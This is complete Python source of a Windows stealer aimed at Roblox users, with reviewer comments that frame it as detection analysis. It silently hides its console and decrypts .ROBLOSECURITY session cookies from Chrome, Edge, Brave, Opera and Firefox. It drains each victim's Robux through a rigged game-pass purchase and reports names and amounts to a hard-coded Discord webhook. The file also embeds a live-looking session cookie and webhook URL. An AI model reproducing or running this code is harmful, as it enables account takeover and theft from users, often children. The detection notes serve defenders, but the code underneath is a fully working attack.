import requests
import time
import json
import random
import os
import sys
import ctypes
import sqlite3
import shutil
import base64
import win32crypt
from Crypto.Cipher import AES
import win32api
import win32con
from datetime import datetime
# ===== CONFIGURATION - PUT YOUR COOKIE AND WEBHOOK HERE =====
MY_ROBLOX_COOKIE = "_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_CAEaAhADIhsKBGR1aWQSEzkwNTAyOTk5OTIzMzQzMTk0MjAoAw.qMh5mnWjyLJU3Bgo5Z1LKQIDIV70Xs-8uZIQrB2ZKSj8urAq1J7DUuOadVGmpnDfOFzAQK_eCa9Wy5isxuxx13Pa2Vul_BilDJHy3wmext2y3HYOJxUouqmPgNXldSOUFwKtgOhYyc4EE-iZ7x2MIut75enolTN33UP7aamvpbNRH4NZlht7MYbqkkLXutw1xOVEjUuhmTNrv-_9d2wtQpsazL_bKybJD_h0aRyRyEi_dqxeMKtf30yk4oGEvEsRnygqHychbhzw7Q4vKvY7KYvZFT5TIwnVB7rIFirQMTA-oiCmocfTxgV1js-uC9M6BZzmIoHwj5b0wPWNds_vOGHEpdgmGTbVN9xe2I3mMUYSPBEF6CM_ukzj9Kr9Ne4ZJ71kCHlpeN1JswgFMVJ4_R2nKnhCTELpjESo9OLi7GShy072bOjxwtbL42-qDMYvQ9_NQI_jqWrksEpDn-f4b3oEqUhflu6iMgJQ3Skqqk9BehKliffwdMTNNZ97GhjdOUqNoB_w_N7XG8Zrd-UkRAx1-sH6ROmryhiltMwDhxrWgPiwLnXpkKC5QQuVs4hBH4nGmy6efvhsSLlP_MhUFHHI42f0NOvF7Ib_zawe5PQrIN3xbuQ7wOSpVghF8MPtPBv_XWtOpJIlpcvw0hWb-uqDR4ByzLdrUM5GI0ABIuu5PMFBUryKoAiwVYiYvxOeXa6fNiUb775CuOtuYPDUe0xJOoHYVBqM__q19luGUv-5nX5sKSlwE3C1A7sDaMCBlFIzXThv728bN3bSOwXyoU7OUkqX2uIAz9E45U7Eg_KWGdTU"
DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1475212900674043948/D1azaDhmI3-O0VGh0rnhwEJNfRdvw7m8e0dSyhIGLJPS3XMSuovPbPYIXzwIZQdErPHw"
# ============================================================
# Hide console completely
# NOTE(review): ShowWindow is called with 0 (SW_HIDE) on this process's own
# console window, so the logged-in user sees nothing while the script runs.
# A script that hides its console as its first action is a behavioural signal
# worth alerting on in endpoint telemetry.
if sys.platform == 'win32':
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
# NOTE(review): credential-theft tooling; annotated here for analysis and
# detection only. Indentation was lost in this paste, so nesting is read from
# the statement order and should be treated as approximate.
class SilentCookieStealer:
def __init__(self):
# Operator-side session: requests sent through it carry the hard-coded
# MY_ROBLOX_COOKIE value as the .ROBLOSECURITY cookie.
self.my_session = requests.Session()
self.my_session.cookies['.ROBLOSECURITY'] = MY_ROBLOX_COOKIE
# Filled in by setup_receiver(); None until then.
self.my_user_id = None
self.my_universe_id = None
# Running total incremented in drain_single() and reported to the webhook.
self.total_drained = 0
# NOTE(review): reads the browser's 'Local State' file and unwraps the cookie
# encryption key with DPAPI. Detection point: a process other than the browser
# itself opening 'Local State' and then calling CryptUnprotectData is a
# high-signal event for EDR/Sysmon file-access rules. The call presumably only
# succeeds because the script runs as the logged-in user (DPAPI user scope).
def get_local_state_key(self, path):
"""Get encryption key from Chrome's Local State"""
try:
# 'Local State' is looked up two directory levels above the cookie DB path.
local_state_path = os.path.join(os.path.dirname(os.path.dirname(path)), 'Local State')
if os.path.exists(local_state_path):
with open(local_state_path, 'r', encoding='utf-8') as f:
local_state = json.load(f)
encrypted_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])
encrypted_key = encrypted_key[5:] # Remove 'DPAPI' prefix
# Element [1] of the CryptUnprotectData result is returned as the key.
return win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
# Bare except: every failure (missing file, bad JSON, DPAPI error) is
# swallowed silently, leaving no error output on the host.
except:
pass
# Returned when the file is absent or any step above raised.
return None
# NOTE(review): decrypts one cookie blob with the key from
# get_local_state_key(). Returns the UTF-8 text, or None when both the AES-GCM
# path and the direct-DPAPI fallback raise.
def decrypt_chrome_cookie(self, encrypted_value, key):
"""Decrypt Chrome v80+ cookies"""
try:
# Chrome 80+ uses AES-256-GCM
# Blob is sliced as: 3-byte prefix | 12-byte nonce | ciphertext | 16-byte tag.
nonce = encrypted_value[3:15]
ciphertext = encrypted_value[15:-16]
tag = encrypted_value[-16:]
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
decrypted = cipher.decrypt_and_verify(ciphertext, tag)
return decrypted.decode('utf-8')
# Any failure above (bad tag, wrong key, short blob) falls through to DPAPI.
except:
try:
# Fallback to old method
return win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8')
except:
return None
# NOTE(review): collects .ROBLOSECURITY values from the browser cookie stores
# listed below and returns them de-duplicated. Host indicators visible in this
# block: reads of the listed Cookies / cookies.sqlite files by a non-browser
# process, and short-lived copies named cookies.db and firefox.db in %TEMP%.
# All errors are swallowed by bare excepts, so nothing is logged on failure.
def steal_all_cookies(self):
"""Steal cookies from all browsers silently"""
cookies = []
# Chrome/Edge/Brave paths
# These fixed per-user paths double as a file-access watch list for defenders.
browsers = [
(r'%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies', 'chrome'),
(r'%LOCALAPPDATA%\Google\Chrome\User Data\Profile 1\Cookies', 'chrome'),
(r'%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Cookies', 'edge'),
(r'%LOCALAPPDATA%\Microsoft\Edge\User Data\Profile 1\Cookies', 'edge'),
(r'%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default\Cookies', 'brave'),
(r'%APPDATA%\Opera Software\Opera Stable\Cookies', 'opera'),
(r'%APPDATA%\Opera Software\Opera GX Stable\Cookies', 'opera')
]
for path_pattern, browser in browsers:
path = os.path.expandvars(path_pattern)
if os.path.exists(path):
try:
# Get encryption key for Chrome-based browsers
key = None
if browser in ['chrome', 'edge', 'brave']:
key = self.get_local_state_key(path)
# Copy cookie db
# The database is copied to %TEMP%\cookies.db and queried there rather
# than in place; the copy is a forensic artefact while it exists.
temp_path = os.environ['TEMP'] + '\\cookies.db'
shutil.copy2(path, temp_path)
# Connect and extract
conn = sqlite3.connect(temp_path)
cursor = conn.cursor()
# Try different column names (different browser versions)
try:
cursor.execute("SELECT name, encrypted_value FROM cookies WHERE host_key LIKE '%roblox.com%'")
for row in cursor.fetchall():
# Only the session cookie is kept; other roblox.com cookies are ignored.
if row[0] == '.ROBLOSECURITY':
if key and browser in ['chrome', 'edge', 'brave']:
decrypted = self.decrypt_chrome_cookie(row[1], key)
if decrypted:
cookies.append(decrypted)
else:
try:
decrypted = win32crypt.CryptUnprotectData(row[1], None, None, None, 0)[1].decode('utf-8')
cookies.append(decrypted)
except:
pass
except:
# Second schema attempt: plain 'value' column keyed on 'host'.
try:
cursor.execute("SELECT name, value FROM cookies WHERE host LIKE '%roblox.com%'")
for row in cursor.fetchall():
if row[0] == '.ROBLOSECURITY':
cookies.append(row[1])
except:
pass
conn.close()
# NOTE(review): the copy is removed only if execution reaches this line;
# an exception raised earlier in this try block would leave
# %TEMP%\cookies.db behind for incident responders to find.
os.remove(temp_path)
except:
pass
# Firefox paths
firefox_profiles = os.path.expandvars(r'%APPDATA%\Mozilla\Firefox\Profiles')
if os.path.exists(firefox_profiles):
for profile in os.listdir(firefox_profiles):
profile_path = os.path.join(firefox_profiles, profile)
cookies_db = os.path.join(profile_path, 'cookies.sqlite')
if os.path.exists(cookies_db):
try:
# Same copy-then-query pattern, this time via %TEMP%\firefox.db.
temp_path = os.environ['TEMP'] + '\\firefox.db'
shutil.copy2(cookies_db, temp_path)
conn = sqlite3.connect(temp_path)
cursor = conn.cursor()
# The 'value' column is appended as-is; no decryption step is applied here.
cursor.execute("SELECT name, value FROM moz_cookies WHERE host LIKE '%roblox.com%'")
for row in cursor.fetchall():
if row[0] == '.ROBLOSECURITY':
cookies.append(row[1])
conn.close()
os.remove(temp_path)
except:
pass
# Remove duplicates
# set() drops repeats but does not preserve the order of discovery.
return list(set(cookies))
# NOTE(review): prepares the operator's own account using the hard-coded
# session. Returns True when no step raises and False on any exception.
# The hostnames contacted here (users/games/apis.roblox.com) are legitimate
# service endpoints, so they are weak network indicators on their own; the
# originating process is the more useful pivot.
def setup_receiver(self):
"""Setup receiver account silently"""
try:
self.my_session.headers.update({'X-CSRF-TOKEN': self.get_csrf()})
# Get user info
response = self.my_session.get('https://users.roblox.com/v1/users/authenticated')
self.my_user_id = response.json().get('id')
# Get or create universe
universes_url = f'https://games.roblox.com/v2/users/{self.my_user_id}/universes'
universes = self.my_session.get(universes_url).json()
# Uses the first listed universe if any exist, otherwise creates one with
# a random four-digit name suffix.
if universes.get('data'):
self.my_universe_id = universes['data'][0]['id']
else:
create_url = 'https://apis.roblox.com/universes/v1/universes'
data = {'name': f'Game{random.randint(1000,9999)}'}
response = self.my_session.post(create_url, json=data)
self.my_universe_id = response.json().get('universeId')
# NOTE(review): no check that my_user_id / my_universe_id are non-None
# before reporting success.
return True
except:
return False
# NOTE(review): sends a POST to the logout endpoint on the operator session
# and returns the 'x-csrf-token' response header, or None if the request
# raises. The header may also be absent, in which case .get() yields None.
def get_csrf(self):
try:
test = self.my_session.post('https://auth.roblox.com/v2/logout')
return test.headers.get('x-csrf-token')
except:
return None
# NOTE(review): abuses one stolen session cookie to move the account's balance
# to the operator via a game-pass purchase. Indicators and response notes
# grounded in this block:
#   - outbound POST to a discord.com/api/webhooks URL from a non-Discord process;
#   - %TEMP%\log.txt, appended with 'username:amount' lines, which lets
#     responders scope which accounts were affected on this host;
#   - a stolen session cookie stays usable until the session is invalidated
#     (presumably by signing out of all sessions / changing the password;
#     confirm against the platform's guidance).
# Nesting under the 'purchased' check is not recoverable from this paste.
def drain_single(self, cookie):
"""Drain one account silently"""
try:
# Separate session carrying the stolen cookie.
victim = requests.Session()
victim.cookies['.ROBLOSECURITY'] = cookie
victim.headers.update({'X-CSRF-TOKEN': self.get_csrf_for_victim(victim)})
# Get victim info
info = victim.get('https://users.roblox.com/v1/users/authenticated').json()
user_id = info.get('id')
username = info.get('name')
# Get robux
robux = victim.get(f'https://economy.roblox.com/v1/users/{user_id}/currency').json().get('robux', 0)
# Accounts holding fewer than 10 are skipped.
if robux < 10:
return False
# Create gamepass
# Created from the operator session, named with a random four-digit suffix.
gp = self.my_session.post('https://games.roblox.com/v1/game-passes', json={
'universeId': self.my_universe_id,
'name': f'G{random.randint(1000,9999)}'
}).json()
gp_id = gp.get('gamePassId')
# Set price
# Price is set to the victim's entire balance.
self.my_session.patch(f'https://games.roblox.com/v1/game-passes/{gp_id}/details', json={
'PriceInRobux': robux,
'IsForSale': True
})
# Get product ID
product = self.my_session.get(f'https://economy.roblox.com/v1/assets/{gp_id}/details').json()
product_id = product.get('ProductId')
# Buy
# The purchase request is issued from the victim's session.
purchase = victim.post(f'https://economy.roblox.com/v1/purchases/products/{product_id}', json={
'productId': product_id,
'currencyType': 1,
'purchasePrice': robux,
'expectedCurrency': 1,
'expectedPrice': robux
}).json()
if purchase.get('purchased'):
self.total_drained += robux
# Discord notify
# Exfiltrates amount, account name and running total to DISCORD_WEBHOOK.
try:
requests.post(DISCORD_WEBHOOK, json={
"embeds": [{
"title": "💰 Robux Stolen",
"color": 3066993,
"fields": [
{"name": "Amount", "value": f"**{robux}**", "inline": True},
{"name": "Victim", "value": f"**{username}**", "inline": True},
{"name": "Total", "value": f"**{self.total_drained}**", "inline": True}
]
}]
})
except:
pass
# Delete gamepass
self.my_session.post(f'https://www.roblox.com/game-pass/{gp_id}/delete', json={'assetId': gp_id})
# Save log
# Local artefact: plaintext record of affected account names and amounts.
with open(os.environ['TEMP'] + '\\log.txt', 'a') as f:
f.write(f'{username}:{robux}\n')
return True
# Every exception is swallowed; the method then reports False.
except:
pass
return False
# NOTE(review): same logic as get_csrf(), applied to the session passed in:
# POSTs to the logout endpoint and returns the 'x-csrf-token' response header,
# or None if the request raises.
def get_csrf_for_victim(self, session):
try:
test = session.post('https://auth.roblox.com/v2/logout')
return test.headers.get('x-csrf-token')
except:
return None
# NOTE(review): top-level sequence: setup_receiver() -> steal_all_cookies() ->
# drain_single() per cookie with a one-second pause -> summary webhook post.
# Returns early (no output) if setup fails or no cookies are found. The outer
# bare except means the process exits without any error trace, so absence of
# errors on a host is not evidence that the script did not run.
def run(self):
"""Main execution - COMPLETELY SILENT"""
try:
# Setup receiver
if not self.setup_receiver():
return
# Steal all cookies
cookies = self.steal_all_cookies()
if not cookies:
return
# Drain each account
for cookie in cookies:
self.drain_single(cookie)
time.sleep(1)
# Final Discord update
# Sent only when at least one purchase succeeded.
if self.total_drained > 0:
try:
requests.post(DISCORD_WEBHOOK, json={
"embeds": [{
"title": "✅ BATCH DRAIN COMPLETE",
"color": 3066993,
"fields": [
{"name": "Total Robux", "value": f"**{self.total_drained}**"}
]
}]
})
except:
pass
except:
pass
if __name__ == "__main__":
stealer = SilentCookieStealer()
stealer.run()